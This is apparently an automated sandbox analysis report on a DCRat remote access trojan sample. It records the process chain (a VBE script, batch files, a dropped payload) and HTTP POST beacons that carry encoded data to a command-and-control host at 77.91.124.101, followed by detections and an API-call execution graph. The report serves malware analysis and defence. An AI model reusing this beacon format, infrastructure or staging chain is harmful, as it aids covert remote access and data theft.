                                                            Nov 21, 2023 04:48:31.811938047 CET | 554 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            99 | 192.168.2.5 | 49814 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:32.308875084 CET | 555 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:32.505321980 CET | 555 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:32.505526066 CET | 558 | OUT | Data Raw: 57 59 5d 5e 5b 5b 5f 59 5d 57 55 57 55 5f 57 51 50 5e 58 48 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]^[[_Y]WUWU_WQP^XHVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;)_?+R)3,-79>+ *W$%$#&R-<8>&G''^)#
                                                            Nov 21, 2023 04:48:32.706655025 CET | 558 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Target ID:0
                                                            Start time:04:46:51
                                                            Start date:21/11/2023
                                                            Path:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            Imagebase:0x880000
                                                            File size:1'622'827 bytes
                                                            MD5 hash:C256204DEB01C77E21BA17B5E2411245
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:04:46:51
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
                                                            Imagebase:0xfc0000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:04:47:09
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:04:47:09
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:04:47:09
                                                            Start date:21/11/2023
                                                            Path:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
                                                            Imagebase:0xfc0000
                                                            File size:1'300'992 bytes
                                                            MD5 hash:295BF8D9B734730EFA567C8DA9918FE1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:04:47:11
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
                                                            Imagebase:0x7ff695380000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:04:47:12
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:04:47:12
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff6c1e40000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:04:47:12
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff73a210000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:04:47:21
                                                            Start date:21/11/2023
                                                            Path:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
                                                            Imagebase:0x720000
                                                            File size:1'300'992 bytes
                                                            MD5 hash:295BF8D9B734730EFA567C8DA9918FE1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 79%, ReversingLabs
                                                            • Detection: 69%, Virustotal, Browse
                                                            Reputation:low
                                                            Has exited:false

                                                              Execution Graph

                                                              Execution Coverage:9.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:9.1%
                                                              Total number of Nodes:1525
                                                              Total number of Limit Nodes:41
890b5f GetModuleFileNameW CreateFileW 23848->23849 23850 890c08 CloseHandle 23849->23850 23851 890b8f SetFilePointer 23849->23851 23850->23843 23851->23850 23852 890b9d ReadFile 23851->23852 23852->23850 23856 890bbb 23852->23856 23857 890c94 GetFileAttributesW 23854->23857 23859 890c5d CompareStringW 23854->23859 23860 890cac 23854->23860 23939 88b146 23854->23939 23942 89081b 23854->23942 23856->23850 23858 89081b 2 API calls 23856->23858 23857->23854 23857->23860 23858->23856 23859->23854 23861 890cb7 23860->23861 23864 890cec 23860->23864 23863 890cd0 GetFileAttributesW 23861->23863 23865 890ce8 23861->23865 23862 890dfb 23886 89a64d GetCurrentDirectoryW 23862->23886 23863->23861 23863->23865 23864->23862 23866 88b146 GetVersionExW 23864->23866 23865->23864 23867 890d06 23866->23867 23868 890d0d 23867->23868 23869 890d73 23867->23869 23870 89081b 2 API calls 23868->23870 23871 884092 _swprintf 51 API calls 23869->23871 23872 890d17 23870->23872 23873 890d9b AllocConsole 23871->23873 23876 89081b 2 API calls 23872->23876 23874 890da8 GetCurrentProcessId AttachConsole 23873->23874 23875 890df3 ExitProcess 23873->23875 23953 8a3e13 23874->23953 23878 890d21 23876->23878 23949 88e617 23878->23949 23879 890dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23879->23875 23882 884092 _swprintf 51 API calls 23883 890d4f 23882->23883 23884 88e617 53 API calls 23883->23884 23885 890d5e 23884->23885 23885->23875 23886->23641 23888 89081b 2 API calls 23887->23888 23889 89ac2a OleInitialize 23888->23889 23890 89ac4d GdiplusStartup SHGetMalloc 23889->23890 23890->23643 23892 89c5ce 23891->23892 23893 89c6e4 23892->23893 23894 891fac CharUpperW 23892->23894 23978 88f3fa 82 API calls 2 library calls 23892->23978 23893->23652 23893->23653 23894->23892 23897 89ec50 23896->23897 23898 89dbeb SetEnvironmentVariableW 23897->23898 23900 89dc0e 23898->23900 23899 89dc36 23899->23646 23900->23899 23901 89dc2a SetEnvironmentVariableW 23900->23901 23901->23899 23979 884065 23902->23979 
23905 89b6dd LoadBitmapW 23906 89b70b GetObjectW 23905->23906 23907 89b6fe 23905->23907 23911 89b71a 23906->23911 24047 89a6c2 FindResourceW 23907->24047 24042 89a5c6 23911->24042 23913 89b770 23924 88da42 23913->23924 23914 89b74c 24061 89a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23914->24061 23915 89a6c2 12 API calls 23918 89b73d 23915->23918 23917 89b754 24062 89a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23917->24062 23918->23914 23920 89b743 DeleteObject 23918->23920 23920->23914 23921 89b75d 24063 89a80c 8 API calls 23921->24063 23923 89b764 DeleteObject 23923->23913 24074 88da67 23924->24074 23929 8990b7 24207 89eb38 23929->24207 23933 89acab GdiplusShutdown OleUninitialize 23932->23933 23933->23681 23935->23673 23936->23679 23938 89086d GetModuleHandleW 23937->23938 23938->23841 23938->23842 23940 88b15a GetVersionExW 23939->23940 23941 88b196 23939->23941 23940->23941 23941->23854 23943 89ec50 23942->23943 23944 890828 GetSystemDirectoryW 23943->23944 23945 89085e 23944->23945 23946 890840 23944->23946 23945->23854 23947 890851 LoadLibraryW 23946->23947 23947->23945 23948->23848 23950 88e627 23949->23950 23955 88e648 23950->23955 23954 8a3e1b 23953->23954 23954->23879 23954->23954 23961 88d9b0 23955->23961 23958 88e66b LoadStringW 23959 88e645 23958->23959 23960 88e682 LoadStringW 23958->23960 23959->23882 23960->23959 23966 88d8ec 23961->23966 23963 88d9e2 23963->23958 23963->23959 23964 88d9cd 23964->23963 23974 88d9f0 26 API calls 23964->23974 23967 88d904 23966->23967 23972 88d984 _strncpy 23966->23972 23969 88d928 23967->23969 23975 891da7 WideCharToMultiByte 23967->23975 23973 88d959 23969->23973 23976 88e5b1 50 API calls __vsnprintf 23969->23976 23972->23964 23977 8a6159 26 API calls 3 library calls 23973->23977 23974->23963 23975->23969 23976->23973 23977->23972 23978->23892 23980 88407c __vsnwprintf_l 23979->23980 23983 8a5fd4 23980->23983 23986 8a4097 23983->23986 23987 8a40bf 23986->23987 23988 8a40d7 23986->23988 24003 8a91a8 20 API 
calls _abort 23987->24003 23988->23987 23990 8a40df 23988->23990 24005 8a4636 23990->24005 23991 8a40c4 24004 8a9087 26 API calls _abort 23991->24004 23995 8a40cf 23997 89fbbc CatchGuardHandler 5 API calls 23995->23997 23999 884086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23997->23999 23998 8a4167 24014 8a49e6 51 API calls 3 library calls 23998->24014 23999->23905 24002 8a4172 24015 8a46b9 20 API calls _free 24002->24015 24003->23991 24004->23995 24006 8a40ef 24005->24006 24007 8a4653 24005->24007 24013 8a4601 20 API calls 2 library calls 24006->24013 24007->24006 24016 8a97e5 GetLastError 24007->24016 24009 8a4674 24036 8a993a 38 API calls __cftof 24009->24036 24011 8a468d 24037 8a9967 38 API calls __cftof 24011->24037 24013->23998 24014->24002 24015->23995 24017 8a97fb 24016->24017 24020 8a9801 24016->24020 24038 8aae5b 11 API calls 2 library calls 24017->24038 24019 8ab136 _abort 20 API calls 24021 8a9813 24019->24021 24020->24019 24022 8a9850 SetLastError 24020->24022 24023 8a981b 24021->24023 24039 8aaeb1 11 API calls 2 library calls 24021->24039 24022->24009 24025 8a8dcc _free 20 API calls 24023->24025 24027 8a9821 24025->24027 24026 8a9830 24026->24023 24028 8a9837 24026->24028 24029 8a985c SetLastError 24027->24029 24040 8a9649 20 API calls _abort 24028->24040 24041 8a8d24 38 API calls _abort 24029->24041 24031 8a9842 24033 8a8dcc _free 20 API calls 24031->24033 24035 8a9849 24033->24035 24035->24022 24035->24029 24036->24011 24037->24006 24038->24020 24039->24026 24040->24031 24064 89a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24042->24064 24044 89a5cd 24045 89a5d9 24044->24045 24065 89a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24044->24065 24045->23913 24045->23914 24045->23915 24048 89a7d3 24047->24048 24049 89a6e5 SizeofResource 24047->24049 24048->23906 24048->23911 24049->24048 24050 89a6fc LoadResource 24049->24050 24050->24048 24051 89a711 LockResource 24050->24051 24051->24048 24052 89a722 GlobalAlloc 24051->24052 24052->24048 
24053 89a73d GlobalLock 24052->24053 24054 89a7cc GlobalFree 24053->24054 24055 89a74c __InternalCxxFrameHandler 24053->24055 24054->24048 24056 89a7c5 GlobalUnlock 24055->24056 24066 89a626 GdipAlloc 24055->24066 24056->24054 24059 89a79a GdipCreateHBITMAPFromBitmap 24060 89a7b0 24059->24060 24060->24056 24061->23917 24062->23921 24063->23923 24064->24044 24065->24045 24067 89a638 24066->24067 24068 89a645 24066->24068 24070 89a3b9 24067->24070 24068->24056 24068->24059 24068->24060 24071 89a3da GdipCreateBitmapFromStreamICM 24070->24071 24072 89a3e1 GdipCreateBitmapFromStream 24070->24072 24073 89a3e6 24071->24073 24072->24073 24073->24068 24075 88da75 __EH_prolog 24074->24075 24076 88daa4 GetModuleFileNameW 24075->24076 24077 88dad5 24075->24077 24078 88dabe 24076->24078 24120 8898e0 24077->24120 24078->24077 24080 88db31 24131 8a6310 24080->24131 24082 88e261 78 API calls 24085 88db05 24082->24085 24085->24080 24085->24082 24098 88dd4a 24085->24098 24086 88db44 24087 8a6310 26 API calls 24086->24087 24095 88db56 ___vcrt_FlsGetValue 24087->24095 24088 88dc85 24088->24098 24167 889d70 81 API calls 24088->24167 24092 88dc9f ___std_exception_copy 24093 889bd0 82 API calls 24092->24093 24092->24098 24096 88dcc8 ___std_exception_copy 24093->24096 24095->24088 24095->24098 24145 889e80 24095->24145 24161 889bd0 24095->24161 24166 889d70 81 API calls 24095->24166 24096->24098 24115 88dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 24096->24115 24168 891b84 MultiByteToWideChar 24096->24168 24154 88959a 24098->24154 24099 88e159 24104 88e1de 24099->24104 24174 8a8cce 26 API calls 2 library calls 24099->24174 24101 88e16e 24175 8a7625 26 API calls 2 library calls 24101->24175 24103 88e1c6 24176 88e27c 78 API calls 24103->24176 24105 88e214 24104->24105 24108 88e261 78 API calls 24104->24108 24109 8a6310 26 API calls 24105->24109 24108->24104 24110 88e22d 24109->24110 24111 8a6310 26 API calls 24110->24111 24111->24098 24113 891da7 WideCharToMultiByte 24113->24115 
24115->24098 24115->24099 24115->24113 24169 88e5b1 50 API calls __vsnprintf 24115->24169 24170 8a6159 26 API calls 3 library calls 24115->24170 24171 8a8cce 26 API calls 2 library calls 24115->24171 24172 8a7625 26 API calls 2 library calls 24115->24172 24173 88e27c 78 API calls 24115->24173 24118 88e29e GetModuleHandleW FindResourceW 24119 88da55 24118->24119 24119->23929 24121 8898ea 24120->24121 24122 88994b CreateFileW 24121->24122 24123 88996c GetLastError 24122->24123 24127 8899bb 24122->24127 24177 88bb03 24123->24177 24125 88998c 24126 889990 CreateFileW GetLastError 24125->24126 24125->24127 24126->24127 24130 8899b5 24126->24130 24128 8899ff 24127->24128 24129 8899e5 SetFileTime 24127->24129 24128->24085 24129->24128 24130->24127 24132 8a6349 24131->24132 24133 8a634d 24132->24133 24144 8a6375 24132->24144 24181 8a91a8 20 API calls _abort 24133->24181 24135 8a6352 24182 8a9087 26 API calls _abort 24135->24182 24136 89fbbc CatchGuardHandler 5 API calls 24138 8a66a6 24136->24138 24138->24086 24139 8a635d 24140 89fbbc CatchGuardHandler 5 API calls 24139->24140 24141 8a6369 24140->24141 24141->24086 24143 8a6699 24143->24136 24144->24143 24183 8a6230 5 API calls CatchGuardHandler 24144->24183 24146 889e92 24145->24146 24147 889ea5 24145->24147 24148 889eb0 24146->24148 24184 886d5b 77 API calls 24146->24184 24147->24148 24149 889eb8 SetFilePointer 24147->24149 24148->24095 24149->24148 24151 889ed4 GetLastError 24149->24151 24151->24148 24152 889ede 24151->24152 24152->24148 24185 886d5b 77 API calls 24152->24185 24155 8895be 24154->24155 24156 8895cf 24154->24156 24155->24156 24157 8895ca 24155->24157 24158 8895d1 24155->24158 24156->24118 24186 88974e 24157->24186 24191 889620 24158->24191 24162 889bdc 24161->24162 24164 889be3 24161->24164 24162->24095 24164->24162 24165 889785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24164->24165 24206 886d1a 77 API calls 24164->24206 24165->24164 24166->24095 24167->24092 24168->24115 24169->24115 
24170->24115 24171->24115 24172->24115 24173->24115 24174->24101 24175->24103 24176->24104 24178 88bb10 _wcslen 24177->24178 24179 88bbb8 GetCurrentDirectoryW 24178->24179 24180 88bb39 _wcslen 24178->24180 24179->24180 24180->24125 24181->24135 24182->24139 24183->24144 24184->24147 24185->24148 24187 889781 24186->24187 24188 889757 24186->24188 24187->24156 24188->24187 24197 88a1e0 24188->24197 24192 88962c 24191->24192 24193 88964a 24191->24193 24192->24193 24195 889638 FindCloseChangeNotification 24192->24195 24194 889669 24193->24194 24205 886bd5 76 API calls 24193->24205 24194->24156 24195->24193 24198 89ec50 24197->24198 24199 88a1ed DeleteFileW 24198->24199 24200 88977f 24199->24200 24201 88a200 24199->24201 24200->24156 24202 88bb03 GetCurrentDirectoryW 24201->24202 24203 88a214 24202->24203 24203->24200 24204 88a218 DeleteFileW 24203->24204 24204->24200 24205->24194 24206->24164 24208 89eb3d ___std_exception_copy 24207->24208 24209 8990d6 24208->24209 24212 89eb59 24208->24212 24216 8a7a5e 7 API calls 2 library calls 24208->24216 24209->23665 24211 89f5c9 24218 8a238d RaiseException 24211->24218 24212->24211 24217 8a238d RaiseException 24212->24217 24215 89f5e6 24216->24208 24217->24211 24218->24215 24220 8a7ce1 _abort 24219->24220 24221 8a7cfa 24220->24221 24222 8a7ce8 24220->24222 24243 8aac31 EnterCriticalSection 24221->24243 24255 8a7e2f GetModuleHandleW 24222->24255 24225 8a7ced 24225->24221 24256 8a7e73 GetModuleHandleExW 24225->24256 24226 8a7d9f 24244 8a7ddf 24226->24244 24230 8a7d76 24235 8a7d8e 24230->24235 24240 8a8a91 _abort 5 API calls 24230->24240 24232 8a7d01 24232->24226 24232->24230 24264 8a87e0 20 API calls _abort 24232->24264 24233 8a7de8 24265 8b2390 5 API calls CatchGuardHandler 24233->24265 24234 8a7dbc 24247 8a7dee 24234->24247 24236 8a8a91 _abort 5 API calls 24235->24236 24236->24226 24240->24235 24243->24232 24266 8aac81 LeaveCriticalSection 24244->24266 24246 8a7db8 24246->24233 24246->24234 24267 8ab076 24247->24267 24250 
8a7e1c 24252 8a7e73 _abort 8 API calls 24250->24252 24251 8a7dfc GetPEB 24251->24250 24253 8a7e0c GetCurrentProcess TerminateProcess 24251->24253 24254 8a7e24 ExitProcess 24252->24254 24253->24250 24255->24225 24257 8a7e9d GetProcAddress 24256->24257 24258 8a7ec0 24256->24258 24261 8a7eb2 24257->24261 24259 8a7ecf 24258->24259 24260 8a7ec6 FreeLibrary 24258->24260 24262 89fbbc CatchGuardHandler 5 API calls 24259->24262 24260->24259 24261->24258 24263 8a7cf9 24262->24263 24263->24221 24264->24230 24266->24246 24268 8ab09b 24267->24268 24269 8ab091 24267->24269 24270 8aac98 _abort 5 API calls 24268->24270 24271 89fbbc CatchGuardHandler 5 API calls 24269->24271 24270->24269 24272 8a7df8 24271->24272 24272->24250 24272->24251 25474 8962ca 123 API calls __InternalCxxFrameHandler 25525 89b5c0 100 API calls 25526 8977c0 118 API calls 25527 89ffc0 RaiseException _com_error::_com_error CallUnexpected 24279 89dec2 24280 89decf 24279->24280 24281 88e617 53 API calls 24280->24281 24282 89dedc 24281->24282 24283 884092 _swprintf 51 API calls 24282->24283 24284 89def1 SetDlgItemTextW 24283->24284 24287 89b568 PeekMessageW 24284->24287 24288 89b5bc 24287->24288 24289 89b583 GetMessageW 24287->24289 24290 89b599 IsDialogMessageW 24289->24290 24291 89b5a8 TranslateMessage DispatchMessageW 24289->24291 24290->24288 24290->24291 24291->24288 25476 8a0ada 51 API calls 2 library calls 24397 89e1d1 14 API calls ___delayLoadHelper2@8 25477 89f4d3 20 API calls 25528 8aa3d0 21 API calls 2 library calls 25529 8b2bd0 VariantClear 24401 8810d5 24406 885abd 24401->24406 24407 885ac7 __EH_prolog 24406->24407 24413 88b505 24407->24413 24409 885ad3 24419 885cac GetCurrentProcess GetProcessAffinityMask 24409->24419 24414 88b50f __EH_prolog 24413->24414 24420 88f1d0 82 API calls 24414->24420 24416 88b521 24421 88b61e 24416->24421 24420->24416 24422 88b630 _abort 24421->24422 24425 8910dc 24422->24425 24428 89109e GetCurrentProcess GetProcessAffinityMask 24425->24428 24429 88b597 24428->24429 
24429->24409 24430 89e2d7 24432 89e1db 24430->24432 24431 89e85d ___delayLoadHelper2@8 14 API calls 24431->24432 24432->24431 25531 88f1e8 FreeLibrary 24587 89b7e0 24588 89b7ea __EH_prolog 24587->24588 24755 881316 24588->24755 24591 89bf0f 24820 89d69e 24591->24820 24592 89b82a 24594 89b838 24592->24594 24595 89b89b 24592->24595 24668 89b841 24592->24668 24598 89b878 24594->24598 24599 89b83c 24594->24599 24597 89b92e GetDlgItemTextW 24595->24597 24602 89b8b1 24595->24602 24597->24598 24605 89b96b 24597->24605 24606 89b95f KiUserCallbackDispatcher 24598->24606 24598->24668 24610 88e617 53 API calls 24599->24610 24599->24668 24600 89bf38 24603 89bf41 SendDlgItemMessageW 24600->24603 24604 89bf52 GetDlgItem SendMessageW 24600->24604 24601 89bf2a SendMessageW 24601->24600 24609 88e617 53 API calls 24602->24609 24603->24604 24838 89a64d GetCurrentDirectoryW 24604->24838 24607 89b980 GetDlgItem 24605->24607 24608 89b974 24605->24608 24606->24668 24612 89b994 SendMessageW SendMessageW 24607->24612 24613 89b9b7 SetFocus 24607->24613 24608->24598 24624 89be55 24608->24624 24614 89b8ce SetDlgItemTextW 24609->24614 24615 89b85b 24610->24615 24612->24613 24617 89b9c7 24613->24617 24633 89b9e0 24613->24633 24618 89b8d9 24614->24618 24858 88124f SHGetMalloc 24615->24858 24616 89bf82 GetDlgItem 24620 89bf9f 24616->24620 24621 89bfa5 SetWindowTextW 24616->24621 24623 88e617 53 API calls 24617->24623 24627 89b8e6 GetMessageW 24618->24627 24618->24668 24620->24621 24839 89abab GetClassNameW 24621->24839 24628 89b9d1 24623->24628 24625 88e617 53 API calls 24624->24625 24629 89be65 SetDlgItemTextW 24625->24629 24631 89b8fd IsDialogMessageW 24627->24631 24627->24668 24859 89d4d4 24628->24859 24635 89be79 24629->24635 24631->24618 24637 89b90c TranslateMessage DispatchMessageW 24631->24637 24638 88e617 53 API calls 24633->24638 24634 89c1fc SetDlgItemTextW 24634->24668 24640 88e617 53 API calls 24635->24640 24637->24618 24639 89ba17 24638->24639 24642 884092 _swprintf 51 API calls 
24639->24642 24677 89be9c _wcslen 24640->24677 24641 89bff0 24645 89c020 24641->24645 24648 88e617 53 API calls 24641->24648 24647 89ba29 24642->24647 24643 89c73f 97 API calls 24643->24641 24644 89b9d9 24765 88a0b1 24644->24765 24650 89c73f 97 API calls 24645->24650 24709 89c0d8 24645->24709 24652 89d4d4 16 API calls 24647->24652 24653 89c003 SetDlgItemTextW 24648->24653 24657 89c03b 24650->24657 24651 89c18b 24658 89c19d 24651->24658 24659 89c194 EnableWindow 24651->24659 24652->24644 24661 88e617 53 API calls 24653->24661 24654 89ba68 GetLastError 24655 89ba73 24654->24655 24771 89ac04 SetCurrentDirectoryW 24655->24771 24669 89c04d 24657->24669 24700 89c072 24657->24700 24664 89c1ba 24658->24664 24877 8812d3 GetDlgItem EnableWindow 24658->24877 24659->24658 24660 89beed 24663 88e617 53 API calls 24660->24663 24665 89c017 SetDlgItemTextW 24661->24665 24662 89ba87 24666 89ba9e 24662->24666 24667 89ba90 GetLastError 24662->24667 24663->24668 24672 89c1e1 24664->24672 24678 89c1d9 SendMessageW 24664->24678 24665->24645 24674 89bb11 24666->24674 24679 89bb20 24666->24679 24680 89baae GetTickCount 24666->24680 24667->24666 24875 899ed5 32 API calls 24669->24875 24670 89c0cb 24673 89c73f 97 API calls 24670->24673 24672->24668 24681 88e617 53 API calls 24672->24681 24673->24709 24674->24679 24683 89bd56 24674->24683 24676 89c1b0 24878 8812d3 GetDlgItem EnableWindow 24676->24878 24677->24660 24682 88e617 53 API calls 24677->24682 24678->24672 24691 89bcfb 24679->24691 24692 89bb39 GetModuleFileNameW 24679->24692 24693 89bcf1 24679->24693 24687 884092 _swprintf 51 API calls 24680->24687 24688 89b862 24681->24688 24689 89bed0 24682->24689 24780 8812f1 GetDlgItem ShowWindow 24683->24780 24684 89c066 24684->24700 24695 89bac7 24687->24695 24688->24634 24688->24668 24696 884092 _swprintf 51 API calls 24689->24696 24690 89c169 24876 899ed5 32 API calls 24690->24876 24699 88e617 53 API calls 24691->24699 24869 88f28c 82 API calls 24692->24869 24693->24598 24693->24691 24694 
89bd66 24781 8812f1 GetDlgItem ShowWindow 24694->24781 24772 88966e 24695->24772 24696->24660 24705 89bd05 24699->24705 24700->24670 24706 89c73f 97 API calls 24700->24706 24702 88e617 53 API calls 24702->24709 24703 89c188 24703->24651 24704 89bb5f 24710 884092 _swprintf 51 API calls 24704->24710 24711 884092 _swprintf 51 API calls 24705->24711 24707 89c0a0 24706->24707 24707->24670 24712 89c0a9 DialogBoxParamW 24707->24712 24708 89bd70 24713 88e617 53 API calls 24708->24713 24709->24651 24709->24690 24709->24702 24715 89bb81 CreateFileMappingW 24710->24715 24716 89bd23 24711->24716 24712->24598 24712->24670 24717 89bd7a SetDlgItemTextW 24713->24717 24719 89bbe3 GetCommandLineW 24715->24719 24748 89bc60 __InternalCxxFrameHandler 24715->24748 24728 88e617 53 API calls 24716->24728 24782 8812f1 GetDlgItem ShowWindow 24717->24782 24718 89baed 24722 89baff 24718->24722 24723 89baf4 GetLastError 24718->24723 24724 89bbf4 24719->24724 24720 89bc6b ShellExecuteExW 24746 89bc88 24720->24746 24726 88959a 80 API calls 24722->24726 24723->24722 24870 89b425 SHGetMalloc 24724->24870 24725 89bd8c SetDlgItemTextW GetDlgItem 24730 89bda9 GetWindowLongW SetWindowLongW 24725->24730 24731 89bdc1 24725->24731 24726->24674 24729 89bd3d 24728->24729 24730->24731 24783 89c73f 